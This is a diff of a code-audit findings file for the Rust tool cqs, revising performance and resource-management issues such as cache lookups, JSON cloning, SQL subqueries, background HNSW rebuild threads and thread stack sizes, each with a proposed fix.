+- **Suggested fix:** Build `embeddings` directly from the (cached, new) iterators rather than placeholder-then-overwrite. Either: (1) sort `cached` and `to_embed` indices and merge in order, or (2) build a `HashMap<usize, Embedding>` and `(0..chunk_count).map(|i| map.remove(&i).unwrap_or_else(...))` — but better is to refactor the same way the bulk pipeline does (`create_embedded_batch` at `src/cli/pipeline/embedding.rs:127-143`): zip cached + (to_embed/new_embeddings) in original order without ever materializing a placeholder Vec. This is the same pattern the bulk path already proved.
+
+#### [PF-V1.30-4]: `prepare_for_embedding` always issues store-cache query even when global cache fully satisfies the batch
+- **Difficulty:** easy
+- **Location:** `src/cli/pipeline/embedding.rs:64-82`
+- **Description:** `prepare_for_embedding` first queries the global `EmbeddingCache` (line 47) populating `global_hits`, then UNCONDITIONALLY queries the store cache (line 68) for the same `hashes` slice. On the warm-cache path (e.g. reindex after `cqs slot promote`, or any reindex where chunks are unchanged), the global cache hit-rate approaches 100% and every store query is wasted DB work. The store query at `get_embeddings_by_hashes` is one SELECT but with O(n) bind variables and a JOIN against the `chunks` table — non-trivial latency on big batches. The fix is to filter the second query to only hashes the global cache missed.
+- **Suggested fix:** Compute `let missed_hashes: Vec<&str> = hashes.iter().filter(|h| !global_hits.contains_key(*h)).copied().collect()` and pass `&missed_hashes` to `store.get_embeddings_by_hashes`. When all chunks hit global cache, the store query is skipped entirely. When none do, behaviour is identical to today. Additional comment at line 84 about the `global cache > store cache > embed` precedence is already correct; the implementation just doesn't act on it for the second query.
+
+#### [PF-V1.30-5]: `wrap_value` deep-clones the entire payload via `serde_json::to_value(Envelope::ok(&payload))`
+- **Difficulty:** medium
+- **Location:** `src/cli/json_envelope.rs:160-176`
+- **Description:** `wrap_value(&serde_json::Value)` constructs `Envelope::ok(payload)` (which holds `&Value`), then serializes-and-parses the whole envelope via `serde_json::to_value`. For `serde_json::Value` the `Serialize` impl visits every node and rebuilds an identical tree — a deep clone disguised as a re-serialization round trip. The function is called once per daemon dispatch via `crate::cli::batch::write_json_line` and once per CLI emit, so every `cqs gather --tokens 50000` (which can be 50KB+ of nested objects), every `cqs scout`, every `cqs review` output pays the cost. The header comment at line 153-155 acknowledges "shallow clone of the payload (necessary because `serde_json::json!` macro takes ownership)" — but this isn't shallow, the serde_json round trip walks the whole tree and reallocates every Map and Vec. For a typical 30KB gather payload, that's ~30KB of allocator churn per query; on a busy daemon at 100 QPS that's ~3MB/s of pointless allocator pressure plus the CPU walking the tree.
+- **Suggested fix:** Build the envelope as a `serde_json::Value::Object` directly without a typed-struct round trip. `serde_json::Map::from_iter([("data", payload.clone()), ("error", Value::Null), ("version", Value::Number(1.into()))])`. Single shallow clone of the payload's outer enum tag (the inner Map/Vec stays owned) instead of a tree walk. Even better: change the contract so callers pass an *owned* `serde_json::Value` and `wrap_value` moves it in — `Map::insert("data", payload)` doesn't allocate a copy at all. Most call sites (`batch/mod.rs::write_json_line`) already produce the value just-in-time; switching to by-value is a per-site noop.
+
+#### [PF-V1.30-6]: Daemon socket handler walks the args array twice (validation pass + extraction pass)
+- **Difficulty:** easy
+- **Location:** `src/cli/watch.rs:266-297`
+- **Description:** `handle_socket_client` first scans `request.get("args")` to collect indices of non-string elements (`bad_arg_indices`, lines 267-274), and if the array is clean does a SECOND pass via `arr.iter().filter_map(|v| v.as_str().map(String::from))` (lines 291-296) to materialize the `Vec<String>`. Each daemon query thus walks the `serde_json::Value::Array` twice. Cheap individually but it's literally the request entry point — every daemon query at 100+ QPS pays this. Combine the two passes: do the strict-string validation while building the `Vec<String>` and bail out the moment a non-string is observed.
+- **Suggested fix:** Fold both passes into one:
 ```rust
-let sanitized = sanitize_fts_query(&normalized);
-let expanded = expand_query_for_fts(&sanitized);
-let fts_query = if expanded.is_empty() {
-    sanitized.clone()    // <-- unnecessary clone
-} else {
-    expanded
-};
+let mut args = Vec::new();
+let mut bad_arg_indices = Vec::new();
+if let Some(arr) = request.get("args").and_then(|v| v.as_array()) {
+    for (i, v) in arr.iter().enumerate() {
+        match v.as_str() {
+            Some(s) => args.push(s.to_string()),
+            None => bad_arg_indices.push(i),
+        }
+    }
+}
+if !bad_arg_indices.is_empty() { /* reject */ }
 ```
-`sanitized` is owned and not referenced after line 366. The `.clone()` allocates a fresh String copy on every RRF search. A plain move works here — `sanitized` would be dropped on the `else` branch anyway since `expanded` is taken. Runs on every RRF-enabled search (the default path). A typical query string is ~30-100 bytes; over 1000 queries that's ~100KB of allocator churn, but more importantly it's a zero-cost fix.
-- **Suggested fix:** `let fts_query = if expanded.is_empty() { sanitized } else { expanded };` Drop `.clone()`. The surrounding block owns `sanitized`; no borrow escapes.
+One pass instead of two; preserves the existing reject-with-indices error message.
 
----
+#### [PF-V1.30-7]: `build_graph` correlated subquery for n_callers — N rows × per-row COUNT(*) instead of one GROUP BY
+- **Difficulty:** medium
+- **Location:** `src/serve/data.rs:234-264`
+- **Description:** The node-fetch SQL in `build_graph` includes `COALESCE((SELECT COUNT(*) FROM function_calls fc WHERE fc.callee_name = c.name), 0) AS n_callers_global` as a correlated subquery in the SELECT. SQLite executes the subquery once per row scanned. With `idx_callee_name` present the per-row cost is O(log M) where M = function_calls row count (~30k+ in this repo), and N is the cap'd graph size (`ABS_MAX_GRAPH_NODES`, currently 5000). That's 5000 × log(30k) ≈ 75k index probes for one `/api/graph` request. A single `LEFT JOIN (SELECT callee_name, COUNT(*) AS n FROM function_calls GROUP BY callee_name)` aggregates once and joins by name — one full scan + one hash join, O(M + N), independent of N. On larger projects (the cqs serve /api/graph endpoint is the biggest data fetch in the new web surface) the difference is several hundred ms vs single-digit ms.
+- **Suggested fix:** Replace the correlated subquery with a JOIN against an aggregated subselect:
+```sql
+SELECT c.id, c.name, c.chunk_type, c.language, c.origin, c.line_start, c.line_end,
+       COALESCE(cc.n, 0) AS n_callers_global
+FROM chunks c
+LEFT JOIN (SELECT callee_name, COUNT(*) AS n FROM function_calls GROUP BY callee_name) cc
+  ON cc.callee_name = c.name
+WHERE 1=1 ... ORDER BY n_callers_global DESC, c.id ASC LIMIT ?
+```
+Same result, single aggregation pass. Also benefits `build_hierarchy` which has a similar shape (`src/serve/data.rs:670-754`).
+
+#### [PF-V1.30-8]: `build_graph` edge-dedup HashSet keys clone (file, caller, callee) per row even on dedup miss
+- **Difficulty:** easy
+- **Location:** `src/serve/data.rs:367-373`
+- **Description:** The edge dedup loop builds `let key = (file.clone(), caller.clone(), callee.clone())` for every row regardless of whether the row will be kept, then `seen.insert(key)` — three String clones per fetched row. With `ABS_MAX_GRAPH_EDGES` typical at tens of thousands, that's tens of thousands of extra String allocations per `/api/graph` request, most of them duplicating work the row decode already did (`row.get("file")` already returned an owned String). The pattern was lifted from a deduplicating insert in another module but here the strings are small and the surrounding loop bound is ABS_MAX_GRAPH_EDGES so the cost compounds.
+- **Suggested fix:** Two options. (1) Skip the dedup entirely — the SQL `LIMIT` + the symmetric `IN (...)` twice over already over-fetches; deduping at the resolver step at line 396 is enough since the resolver is a `HashMap` lookup that naturally collapses duplicates by ignoring them. (2) Keep the dedup but switch to a hash-of-bytes key:
+```rust
+use std::collections::hash_map::DefaultHasher;
+let mut h = DefaultHasher::new();
+file.hash(&mut h); caller_name.hash(&mut h); callee_name.hash(&mut h);
+let hash_key = h.finish();
+if seen.insert(hash_key) { accum.push((file, caller_name, callee_name)); }
+```
+Hash collisions on a `u64` keyed `HashSet<u64>` are negligible at <1M edges. Cuts allocations from 3N+1 strings to ~zero.
+
+#### [PF-V1.30-9]: `extract_imports` uses `HashSet<String>` — allocates a `String` per candidate line even on duplicate rejection
+- **Difficulty:** easy
+- **Location:** `src/where_to_add.rs:258-276`
+- **Description:** `extract_imports` iterates every line of every chunk, and for every line that matches a prefix it calls `seen.insert(trimmed.to_string())`. The HashSet stores `String` so insertion always allocates, even when the value is rejected as a duplicate (HashSet still hashes its borrowed key, but the caller materialized the String first). For a Rust file with ~50 chunks × ~30 lines/chunk × 5 prefixes, that's ~7500 `to_string` calls per `cqs where`/`cqs task` invocation — most of which are non-import lines that matched the prefix loosely or duplicate imports already seen. Lines borrowed from `chunks` are valid for the lifetime of the function so a borrowed-key HashSet works.
+- **Suggested fix:** Switch `seen` to `HashSet<&str>` with the same lifetime as `chunks`:
+```rust
+let mut seen: HashSet<&str> = HashSet::new();
+let mut imports: Vec<String> = Vec::new();
+for chunk in chunks {
+    for line in chunk.content.lines() {
+        let trimmed = line.trim();
+        for &prefix in prefixes {
+            if trimmed.starts_with(prefix) && imports.len() < max && seen.insert(trimmed) {
+                imports.push(trimmed.to_string());  // Allocate only on accept
+                break;
+            }
+        }
+    }
+}
+```
+Allocation now happens only for accepted imports (capped at `max=5`), not per candidate line. ~1500× fewer String allocations on a typical Rust file.
+
+#### [PF-V1.30-10]: Watch `reindex_files` cached embedding clone via `existing.get` instead of `.remove`
+- **Difficulty:** easy
+- **Location:** `src/cli/watch.rs:2879-2887`
+- **Description:** The cached-embedding loop:
+```rust
+for (i, chunk) in chunks.iter().enumerate() {
+    if let Some(emb) = existing.get(&chunk.content_hash) {
+        cached.push((i, emb.clone()));   // clone every cached Embedding
+    } else {
+        to_embed.push((i, chunk));
+    }
+}
+```
+Every cache hit clones the `Embedding` (inner `Vec<f32>`, dim=1024 default = 4KB allocation per hit). For a 100-file save that touches 500 chunks with 80% cache hit rate, that's ~400 × 4KB = 1.6MB of allocator churn per watch event — and watch events fire on every save in active development. The `existing` map is consumed only by this loop and discarded afterward, so we can `.remove()` to take ownership instead.
+- **Suggested fix:** Make `existing` mutable (already is — `let mut`isn't there but the binding owns the map) and use `existing.remove(&chunk.content_hash)` to take ownership:
+```rust
+let mut existing = store.get_embeddings_by_hashes(&hashes)?;
+let mut cached: Vec<(usize, Embedding)> = Vec::new();
+let mut to_embed: Vec<(usize, &cqs::Chunk)> = Vec::new();
+for (i, chunk) in chunks.iter().enumerate() {
+    if let Some(emb) = existing.remove(&chunk.content_hash) {
+        cached.push((i, emb));
+    } else {
+        to_embed.push((i, chunk));
+    }
+}
+```
+Eliminates every Embedding clone on the cache-hit path. Mirrors the `global_hits.remove` pattern already used at `src/cli/pipeline/embedding.rs:97`. P3 #126-style fix the watch path missed.
+
 
 ## Resource Management
 
-#### [RM-V1.29-1]: `load_references` rebuilds a 4-thread rayon pool + reloads every reference from disk on every `--include-refs` search
+#### [RM-V1.30-1]: Background HNSW rebuild thread is detached — daemon shutdown cannot wait for it
 - **Difficulty:** medium
-- **Location:** `src/cli/batch/handlers/search.rs:286`, `src/reference.rs:204-217`
-- **Description:** The daemon search handler at `batch/handlers/search.rs:286` calls `cqs::reference::load_references(&config.references)` on every `--include-refs` search. That function (`reference.rs:204`) builds a fresh `rayon::ThreadPoolBuilder::new().num_threads(4).build()` **each call**, then reopens every reference Store (~16MB mmap) and HNSW index (~50-200MB) before the search — then drops everything at function scope exit. `BatchContext::refs` holds an LRU cache of `ReferenceIndex` specifically to avoid this, but `ctx.get_ref(...)` is only wired into explicit `--ref` queries, not the `--include-refs` multi-ref merge path. Impact: on a project with 3 references, every `cqs search --include-refs "q"` against the daemon pays 4 OS-thread spawn + teardown + 3 × (16MB mmap + 50-200MB HNSW load) ≈ 500ms-1s of pure I/O/TLB churn that the cache was designed to eliminate. The docstring above `refs: RefCell<LruCache<String, ReferenceIndex>>` in `batch/mod.rs:273` even says `Reduced from 4 to 2 — each ReferenceIndex holds Store + HNSW (50-200MB)` — but the `--include-refs` hot path never consults it.
-- **Suggested fix:** Add `BatchContext::get_all_refs(&self) -> Result<Vec<Arc<ReferenceIndex>>>` that populates/reads from `self.refs` with one LRU miss per name (not a whole reload pass), then change `handlers/search.rs:286` to call it. Drop the sequential-fallback rayon pool construction — use the default global pool (which is what `par_iter()` at `:290` already does after `pool.install`, once the pool is unnecessary).
+- **Location:** `src/cli/watch.rs:965-1042` (`spawn_hnsw_rebuild`)
+- **Description:** PR #1113 spawns a background HNSW rebuild via `std::thread::Builder::new().name(...).spawn(...)` and stores only the mpsc `Receiver` in `PendingRebuild` (line 1037-1041). The `JoinHandle` is dropped immediately, so the thread is detached. On `systemctl stop cqs-watch` (SIGTERM) the daemon's main loop exits and `WatchState` drops, but the rebuild thread (which holds its own `Store::open_readonly_pooled` handle plus a CUDA build pipeline at `commands::build_hnsw_index_owned`) keeps running until it sends on the channel — even though the receiver is already gone. On the user's A6000 a full 17k-chunk CUDA HNSW build is ~10-15s, plus another ~10-15s for the base index. Worst case: a `systemctl restart cqs-watch` triggers a fresh rebuild on the new daemon while the old daemon's orphaned rebuild thread is still spending GPU memory + CUDA streams on the now-discarded result. Two CUDA HNSW builds running concurrently against the same `index.db` snapshot is exactly the contention pattern that leads to `cuda_runtime` API errors (cuvs is process-global, not per-context). In addition, `index.hnsw.lock` may be re-acquired by the new daemon while the old thread still has it open via `Owned::save` — leading to a half-written graph file.
+- **Suggested fix:** Hold the `JoinHandle` inside `PendingRebuild` next to `rx`. On daemon shutdown (the `loop` exit in `cmd_watch`), call `pending_rebuild.take().map(|p| p.handle.join())` with a bounded timeout (e.g. 2s) before letting the daemon exit. Better: have `spawn_hnsw_rebuild` accept a `Arc<AtomicBool>` cancellation flag, check it inside `build_hnsw_index_owned` between batches, and bail with `RebuildOutcome::Err(anyhow!("cancelled"))` so the GPU work stops promptly.
 
-#### [RM-V1.29-2]: `evict_global_embedding_cache_with_runtime` opens `QueryCache` with a fresh single-thread tokio runtime every eviction tick
+#### [RM-V1.30-2]: `pending_rebuild.delta` grows unbounded during a long rebuild window
 - **Difficulty:** easy
-- **Location:** `src/cli/batch/mod.rs:1225`
-- **Description:** Once per hour the daemon calls `evict_global_embedding_cache_with_runtime`. The EmbeddingCache half uses `open_with_runtime(&cache_path, runtime)` and reuses the shared daemon runtime — correct. But the QueryCache half at `:1225` calls `cqs::cache::QueryCache::open(&q_path)` (not `open_with_runtime`), which spawns a new `tokio::runtime::Builder::new_current_thread()` runtime (cache.rs:1015) just to run one `DELETE` SQL, then drops it. Every hour, on a daemon that already has `self.runtime` available right above, a fresh tokio runtime is spun up, used for ~10ms of SQL, and torn down. Not catastrophic but the asymmetry is against the `#968` runtime-sharing design documented two lines above in the same function. Small FD churn + wasted thread init on every tick.
-- **Suggested fix:** Use `cqs::cache::QueryCache::open_with_runtime(&q_path, Some(runtime.clone()))` mirroring the EmbeddingCache path above. The `runtime` parameter is already threaded in.
+- **Location:** `src/cli/watch.rs:611,623-626,2667-2674,2740-2741`
+- **Description:** While a background HNSW rebuild is in flight (10-30s), every reindex cycle appends every newly-embedded chunk into `pending.delta: Vec<(String, Embedding)>` (line 2674). Each `Embedding` is `dim × 4 bytes` ≈ 4 KB on BGE-large (1024-dim). A bulk file operation during the rebuild — e.g. `git checkout` of a feature branch touching 5k files, `find -name '*.rs' -exec sed -i ...`, or a `cargo fix` pass — can push tens of thousands of chunks into the delta before the rebuild completes. 30k entries × 4 KB = 120 MB held in `WatchState`, on top of the rebuild thread's own working memory and the in-memory `state.hnsw_index`. There is no cap, no warn-on-overflow, no spill-to-disk fallback, and no early-cancel of the in-flight rebuild even when delta has already invalidated the snapshot it's building from.
+- **Suggested fix:** Cap `delta` at e.g. `MAX_PENDING_REBUILD_DELTA = 5_000` entries (~20 MB on 1024-dim). On overflow: `tracing::warn!`, drop oldest entries (or all of them — the next `threshold_rebuild` will pick the chunks up from SQLite anyway), and mark the rebuild as `state.pending_rebuild = None` to short-circuit the swap entirely (the new in-memory index would be ~useless given the volume of misses). Add a structured event so operators can see when the daemon entered "delta saturation" mode.
 
-#### [RM-V1.29-3]: `search_across_projects` builds a fresh rayon pool on every `cqs project search` invocation
+#### [RM-V1.30-3]: `Embedder::new` opens a fresh `QueryCache` SQLite + 7-day prune on every CLI subcommand
+- **Difficulty:** easy
+- **Location:** `src/embedder/mod.rs:355-366`
+- **Description:** `Embedder::new` unconditionally calls `QueryCache::open(&QueryCache::default_path())` followed by `c.prune_older_than(7)` (line 358-361), even on commands that will never call `embed_query` (e.g. `cqs notes list`, `cqs read`, `cqs slot list`, `cqs cache stats`, `cqs explain --no-embed`). The `QueryCache` is constructed lazily *during the embedder*, but the embedder itself is constructed eagerly by every CLI handler that takes a `cli.try_model_config()` (16 call sites in `Bash` cross-check above). Each open is: `std::fs::create_dir_all` + `chmod 0o700` + new tokio `current_thread` runtime + SqlitePool with `max_connections=1` + 4 PRAGMA + WAL setup + `prune_older_than(7)` (a `DELETE` against `query_cache`). Cold start of `cqs --help` (which already lazy-loads the embedder for completion) pays this; a hot `cqs notes list` run via daemon doesn't, but a CLI bypass (`CQS_NO_DAEMON=1`) does. On WSL DrvFS this is ~30-50ms of completely wasted I/O per invocation.
+- **Suggested fix:** Lazy-open the disk cache the first time it's actually used inside `embed_query`. Store it as `OnceLock<Option<QueryCache>>` rather than constructing eagerly in `new_with_provider`. The in-memory `LruCache` stays as-is; only the SQLite-backed half pays the cold open. Bonus: cli subcommands that are pure SQL (notes, slot, cache, telemetry) no longer touch `~/.cache/cqs/query_cache.db` at all.
+
+#### [RM-V1.30-4]: `LocalProvider::stash` retains all submitted batch results until provider drop
 - **Difficulty:** medium
-- **Location:** `src/project.rs:217`
-- **Description:** `search_across_projects` (called from `cli/commands/infra/project.rs:128`) rebuilds `rayon::ThreadPoolBuilder::new().num_threads(4).build()` every call. Unlike `load_references`, this is a per-CLI-invocation command so the per-build overhead is bounded to one build — but the fallback behavior is hidden: on pool creation failure it silently falls back to sequential, which the user can't distinguish from a slow-networked project store. The thread pool builder also doesn't set `thread_name`, so `ps` / `journalctl` show anonymous rayon worker threads. More importantly, for daemon mode (when someone wires this through batch handlers, eventually) this pattern will leak 4 threads per call with no LazyLock caching — the issue will recur.
-- **Suggested fix:** Cache the pool via `OnceLock<Arc<rayon::ThreadPool>>`, or use the default global rayon pool with `par_iter()` directly. Either way, thread name each worker via `.thread_name(|i| format!("cqs-projects-{i}"))` so operators can spot it. Same applies to the sibling constructor in `reference.rs:204`.
+- **Location:** `src/llm/local.rs:74,304-309,542-547`
+- **Description:** `LocalProvider::submit_via_chat_completions` (PR #1101) stores each submitted batch's results in `self.stash: Mutex<HashMap<String, HashMap<String, String>>>`, keyed by batch_id. The only path that removes entries is `fetch_batch_results` (line 545: `stash.remove(batch_id)`). If a caller submits multiple batches and crashes (or panics) between submit and fetch, all unfetched batches stay resident for the lifetime of the `LocalProvider`. Even on the happy path, a long-running `cqs index --llm-summaries` over a 5k-chunk corpus with `concurrency=4` may submit several batches sequentially: each batch ~250 successful items × 500-byte summary text ≈ 125 KB stashed at a time, but if a batch fails the entries-so-far are retained anyway because the function returns `Err(LlmError::Api{...})` after inserting partial results into the stash (line 304-309 happens unconditionally before the auth-fail bail at 286). Worst case for a 50k-chunk doc-comments pass with 50% timeout failures: ~25k summaries × ~500 bytes = ~12 MB of dead text held in the provider until the CLI exits. There is no LRU, no TTL, no "drain everything older than N" sweep.
+- **Suggested fix:** (1) Move the stash insert past the auth-fail bail so failed batches don't leak partial results. (2) Add `LocalProvider::drain_old_batches(&self, max_keep: usize)` called from the outer `llm_summary_pass` after each `wait_for_batch + fetch_batch_results` cycle. (3) On the auth-fail Err arm at line 286, explicitly clear the stash entry. (4) Cap total stash size: if it exceeds e.g. 1000 batches or 100 MB cumulative, evict oldest by insertion order.
 
-#### [RM-V1.29-4]: `TelemetryAggregator::query_counts` grows unbounded per unique query — no cardinality cap
+#### [RM-V1.30-5]: Daemon never checks `fs.inotify.max_user_watches` — silently drops events on large monorepos
 - **Difficulty:** medium
-- **Location:** `src/cli/commands/infra/telemetry_cmd.rs:246`, `:282-290`
-- **Description:** The aggregator starts with `query_counts: HashMap::with_capacity(64)` but inserts every distinct query string it encounters (`:287 insert(q.clone(), 1)`), with no cap. Telemetry archives can span months. If an agent-generated fuzzing loop, red-team session, or eval baseline run fires thousands of unique queries, the aggregator keeps one HashMap entry (average ~40 bytes key + 8 bytes count) for each. On a 365-day archive with one distinct query per minute (conservative for an AI agent driving cqs), that's ~525k entries ≈ 25MB just for `query_counts`. `finish()` sorts that by count and truncates at top-10, but the full accumulator is held in RAM during the pass. `cqs telemetry --all` then aggregates across ALL archived files serially.
-- **Suggested fix:** Bound `query_counts` with a bounded-top-k heap (keep top-N queries by count, drop the rest), or cap the HashMap at e.g. 10_000 entries and evict the lowest-count entry on overflow. `top_queries` only uses top-10 anyway, so the full distribution is never surfaced. Even a coarse `query_counts.len() > 100_000` bail → tracing::warn would be better than unbounded growth.
+- **Location:** `src/cli/watch.rs:1947-1949`
+- **Description:** `RecommendedWatcher::new(...).watch(&root, RecursiveMode::Recursive)` walks the tree and registers an inotify watch per directory. Linux's `fs.inotify.max_user_watches` defaults to 8192 on older distros, 65536-1048576 on newer ones. On a project with deep `node_modules/`, `target/`, `vendor/`, or `dist/` directories — none of which are filtered before `watch()` because `notify` registers everything before our gitignore filter sees it — the limit can be silently exceeded. `notify` returns `Err` on registration failure for individual sub-directories but the `watch(root, Recursive)` call at line 1949 only returns the *root* registration error. Per-subdir failures are swallowed, leading to "watch isn't picking up changes in src/foo/" with zero diagnostic output. The `--poll` fallback exists but the daemon never auto-detects exhaustion to suggest it.
+- **Suggested fix:** At daemon startup, read `/proc/sys/fs/inotify/max_user_watches` and `/proc/<pid>/status` (Inotify count). If the project's directory count is within 90% of the limit, log a `tracing::warn!` recommending `--poll` or a `sysctl fs.inotify.max_user_watches=524288` bump. For inotify-watcher, replace the direct `watch(&root, Recursive)` with a manual descent that respects the gitignore matcher: only watch directories that wouldn't be ignored anyway (avoids registering target/, node_modules/, .git/). This both reduces inotify pressure and matches the user's expectations about which paths the daemon should react to.
 
-#### [RM-V1.29-5]: CHM and WebHelp page readers use `std::fs::read` with no per-page byte cap
-- **Difficulty:** easy
-- **Location:** `src/convert/chm.rs:107`, `src/convert/webhelp.rs:120`
-- **Description:** Both `CHM` (`chm.rs:107`) and `WebHelp` (`webhelp.rs:120`) page converters use `std::fs::read(entry.path())` to load a page's bytes, then `String::from_utf8_lossy`. Per-file cap is `MAX_FILE_SIZE = 100MB` on the outer archive (via `convert/mod.rs:363`), but individual extracted pages inside are read unconditionally. A malicious or pathological archive containing a single 500MB "page" (or one decompressed to large size) silently allocates the full file plus a UTF-8 transcoded copy. `convert/webhelp.rs:117` does have `MAX_WEBHELP_BYTES = 50 MB` on the outer webhelp bundle, but per-page it's still unbounded. On a 16-core WSL box with 32GB RAM this can still OOM for contrived cases — more importantly, no `tracing::warn` fires to attribute the OOM.
-- **Suggested fix:** Use `std::fs::File::open(...).take(CAP).read_to_end(&mut buf)` per page. Cap at e.g. `MAX_CONVERT_PAGE_BYTES = 10 * 1024 * 1024` (sourced from a `limits.rs` helper, following the convention). Warn on truncation naming the file.
-
-#### [RM-V1.29-6]: `cqs serve` multi-thread runtime has no worker_threads cap — uses `num_cpus` by default
-- **Difficulty:** easy
-- **Location:** `src/serve/mod.rs:63-66`
-- **Description:** `run_server` builds `tokio::runtime::Builder::new_multi_thread().enable_all().build()` with no `.worker_threads(N)` call. Tokio default = num_cpus. On a 32-core A6000 workstation (user's setup) that's 32 worker threads for a read-only HTTP server that serves cached HNSW graph JSON. Compare to the daemon's `build_shared_runtime` at `watch.rs:114-123` which explicitly caps at 4 workers. The watch path has a comment explaining why (`one shared pool replaces three separate per-struct runtimes that previously idled ~6–12 OS threads`); `serve` runs without that discipline. Each idle tokio worker is ~2MB stack + scheduler state → ~64MB just to serve a likely ~1 req/sec endpoint.
-- **Suggested fix:** `.worker_threads(std::thread::available_parallelism().map(|n| n.get().min(4)).unwrap_or(2))` mirroring `build_shared_runtime`. Also `.thread_name("cqs-serve-rt")` so the threads are identifiable in `top`/`htop`.
-
-#### [RM-V1.29-7]: `EmbeddingCache` and `QueryCache` have no `Drop` impl → no WAL checkpoint on daemon shutdown
+#### [RM-V1.30-6]: `select_provider()` triggers CUDA/TensorRT probe + symlink ops for every CLI process, including no-embed commands
 - **Difficulty:** medium
-- **Location:** `src/cache.rs:42-65` (EmbeddingCache), `:968-977` (QueryCache)
-- **Description:** Audit triage v1.29.0-pre P2 #70 was listed as `✅ PR #1045` fixed, but a fresh grep for `impl Drop for EmbeddingCache|impl Drop for QueryCache|pool.close()|wal_checkpoint.*cache` in `src/cache.rs` returns zero matches. `Store` has a proper `Drop` with `PRAGMA wal_checkpoint(TRUNCATE)` at `store/mod.rs:1303-1333`; the two caches do not. On `systemctl stop cqs-watch` (SIGTERM), the shared runtime + caches all drop; the SqlitePool's own drop closes connections cleanly but never issues a checkpoint. The WAL files at `~/.cache/cqs/embeddings.db-wal` and `~/.cache/cqs/query_cache.db-wal` survive across daemon restarts and accumulate until the next opportunistic checkpoint. On an agent workstation with many daemon restarts this grows to hundreds of MB over weeks.
-- **Suggested fix:** Add `impl Drop for EmbeddingCache` / `impl Drop for QueryCache` mirroring `Store::drop` — `catch_unwind` around `rt.block_on(wal_checkpoint(TRUNCATE))`. Or call `self.rt.block_on(...)` inside a `close(self)` method and invoke it from the daemon's shutdown path in `watch.rs` right before the socket guard drops.
+- **Location:** `src/embedder/provider.rs:171-248`, `src/embedder/mod.rs:312-313`
+- **Description:** PR #1120 (Phase A) refactored execution-provider detection but kept the call-site contract: `Embedder::new` → `select_provider()` → `detect_provider()` → `ensure_ort_provider_libs()`. Even with `CACHED_PROVIDER: OnceCell` memoizing the result, the *first* call within a process always: walks `~/.cache/ort.pyke.io/dfbin/<triplet>/`, sorts directory entries, reads `/proc/self/cmdline`, joins multiple `PathBuf`s, calls `dunce::canonicalize` on each library, and `std::os::unix::fs::symlink`s up to 3 `.so` files into both `ort_search_dir` and the first writable `LD_LIBRARY_PATH` entry. On a CLI invocation that never reaches `embed_query` (e.g. `cqs notes list`, which constructs an embedder via `try_model_config`), this is pure waste — the CUDA probe `ort::ep::CUDA::default().is_available()` itself can take 200-500ms because it lazily loads `libcudart.so` and pings the driver. Phase A's `ep-coreml` / `ep-rocm` cfg-gates are correct in spirit but they're cfg-gates over branches that today are dead `tracing::warn!` arms — the `ensure_ort_provider_libs` always fires regardless.
+- **Suggested fix:** Move the provider probe + symlink work into a `LazyLock<ExecutionProvider>` that fires only inside `Session::create_session(model_path, ...)` — i.e. on the first actual ONNX inference, not on every `Embedder::new`. Construction-time should know the *target* provider (from CLI flag / env) but defer side effects until needed. The `Mutex<Option<Session>>` already supports lazy session init; making provider detection equally lazy keeps no-embed commands free of the GPU probe + symlink overhead.
 
-#### [RM-V1.29-8]: `Box::leak` pattern in watch.rs tests intentionally leaks parser/embedder/model on every test run
+#### [RM-V1.30-7]: `LocalProvider::submit_via_chat_completions` worker threads use default 2 MB stack — `concurrency=64` allocates 128 MB just for the fan-out
 - **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:2660-2663` and `:2686-2689`
-- **Description:** Two test helpers do `Box::leak(Box::new(CqParser::new().unwrap()))` plus three more `Box::leak` calls per test (embedder OnceLock, ModelConfig, RwLock gitignore). Under cargo nextest / parallel test runners, each test invocation leaks ~500KB (parser tables) + 16-32 bytes (OnceLock) + ModelConfig. Single run it's negligible; CI loops that run the test suite hundreds of times per hour accumulate. More importantly, these aren't `#[cfg(test)]`-gated at the module level — they're `fn test_cfg()` helpers that `cfg(test)` gates per-callsite, so they ship into the build artifact metadata. A careless `pub fn test_cfg` exposure (or a proc-macro shift) would leak in production. The leaks are also load-bearing for the `&'static` borrow pattern; the right idiom is a test-scoped `OnceLock<T>` or `std::sync::LazyLock`.
-- **Suggested fix:** Replace `Box::leak` with `std::sync::LazyLock::new(|| ...)` at module scope (test-cfg'd). LazyLock holds the reference statically, no leak. Or use `&*Box::leak` inside a `#[test]`-scoped closure so the leak is per-test and the test runner can detect growing heap via valgrind.
+- **Location:** `src/llm/local.rs:163-256` (`std::thread::scope` in `submit_via_chat_completions`)
+- **Description:** `local_concurrency()` clamps `CQS_LOCAL_LLM_CONCURRENCY` at `[1, 64]`. At the upper end, `std::thread::scope` spawns 64 worker threads via `s.spawn(...)` (line 176) with the platform default stack (2 MB on glibc) — 128 MB of stack space just for batch fan-out, on top of the per-thread `reqwest` blocking client state and JSON parsing buffers. The worker body is shallow (channel recv → reqwest send → JSON parse → mutex insert → callback) so 256 KB or 512 KB would suffice. The cap is also surprisingly high: 64 concurrent HTTPS connections to a local llama.cpp server is going to thrash the GPU, not parallelize — the practical sweet spot for `vllm` on an RTX 4000 is 4-8.
+- **Suggested fix:** Use `std::thread::Builder::new().stack_size(512 * 1024).name(format!("cqs-llm-worker-{i}"))` inside a manual scope (or `scope.builder()` if one stabilizes — currently scoped threads use `Scope::spawn` without a stack-size hook, so swap to a `std::thread::Builder` + manual join Vec). Drop the upper clamp from 64 to 16; at >16 the local server is the bottleneck anyway.
 
-#### [RM-V1.29-9]: Daemon socket thread spawn on every accept without pre-bounded stack size
+#### [RM-V1.30-8]: `serve` handlers spawn one `tokio::task::spawn_blocking` per HTTP request, default blocking pool is 512 threads (~1 GB stack)
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:1547-1552`
-- **Description:** `std::thread::Builder::new().name("cqs-daemon-client".to_string()).spawn(...)` uses the default 2MB stack per thread (Linux glibc default). With `MAX_CONCURRENT_DAEMON_CLIENTS=16` default, worst-case is 32MB of stack just for accept handlers — but the cap can be overridden via `CQS_MAX_DAEMON_CLIENTS` to any value. At `CQS_MAX_DAEMON_CLIENTS=128` (e.g. a heavy agent fanout) we allocate 256MB of stacks for connection handlers that do ~1KB of actual work each. The handler itself is shallow (BufReader + dispatch + write), so 128KB stack would suffice.
-- **Suggested fix:** `std::thread::Builder::new().name(...).stack_size(256 * 1024).spawn(...)`. Caps worst-case stack at 32MB even with a 128-client cap. Test under miri or valgrind to confirm 256KB is enough for the `handle_socket_client` deepest call stack (should be trivially so given the non-recursive design).
